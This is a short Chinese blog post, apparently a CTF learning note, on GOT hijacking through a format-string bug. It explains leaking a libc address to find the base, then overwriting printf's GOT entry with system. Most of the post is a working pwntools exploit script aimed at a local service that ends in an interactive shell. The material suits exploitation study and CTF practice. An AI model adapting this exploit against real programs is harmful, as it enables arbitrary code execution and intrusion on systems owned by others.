Pwn_11 Got 劫持

时间：2018-03-08 22:55:25 阅读：926 评论：0 收藏：0 [点我收藏+]

标签：plt load post art sse 技术分享 main ack info

比如说把puts(str)的.got.plt的地址的值改为system函数地址

技术分享图片

格式化字符串的综合利用

可以使用任意地址读取，获取当前函数的实际地址，从而可以获得libc的基地址
利用libc基地址+偏移地址可以知道其他函数地址
利用任意地址写入，从而配合got hijacking更改已有函数地址

　　
from pwn import *

r = remote(‘127.0.0.1‘,4000)

libc_start_got = 0x804a01c
libc = ELF(‘/lib/i386-linux-gnu/libc.so.6‘)
libc_offsset = libc.symbols[‘__libc_start_main‘]

r.sendline(p32(libc_start_got)+‘#‘+‘%5$s‘+‘#‘)

r.recvuntil(‘#‘)
libc_base = u32(r.recvuntil(‘#‘)[:4]) - libc_offsset

printf_got = 0x804a00c
system_off = libc.symbols[‘system‘]
system = libc_base + system_off

r.sendline(fmtstr_payload(5,{printf_got:system}))

r.interactive()

Pwn_11 Got 劫持

标签：plt load post art sse 技术分享 main ack info

原文地址：https://www.cnblogs.com/rookieDanny/p/8531110.html

踩

(0)

评论一句话评论（0）

分享档案

更多>

2021年07月29日 (22)
2021年07月28日 (40)
2021年07月27日 (32)
2021年07月26日 (79)
2021年07月23日 (29)
2021年07月22日 (30)
2021年07月21日 (42)
2021年07月20日 (16)
2021年07月19日 (90)
2021年07月16日 (35)

周排行